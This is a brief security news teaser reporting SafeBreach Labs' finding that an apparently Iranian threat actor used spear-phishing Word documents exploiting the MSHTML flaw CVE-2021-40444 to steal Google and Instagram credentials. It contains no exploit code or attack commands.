Iranian hackers exploit a MSHTML bug to steal Google, Instagram creds

Share on facebook
Share on twitter
Share on linkedin
Share on reddit
Share on email

Researchers from SafeBreach Labs spotted a new Iranian threat actor aimed at Farsi-speaking victims.  The campaign was first spotted in mid-September 2021 by ShadowChasing.

A newly discovered Iranian threat actor is stealing Google and Instagram credentials using a exploit for a Microsoft MSHTML Remote Code Execution flaw.

SafeBreach Labs discovered the attacks (publicly reported in September on Twitter by the Shadow Chaser Group) started in July as spear-phishing emails.

The campaign targets Windows users with malicious Winword attachments that exploit a Microsoft MSHTML remote code execution (RCE) bug tracked as CVE-2021-40444.

“Almost half of the victims are located in the United States. Based on the Microsoft Word document content – which blames Iran’s leader for the ‘Corona massacre’ and the nature of the collected data, we assume that the victims might be Iranians who live abroad and might be seen as a threat to Iran’s Islamic regime,” said Tomer Bar, Director of Security Research at SafeBreach Labs.

“The adversary might be tied to Iran’s Islamic regime since the Telegram surveillance usage

Read the article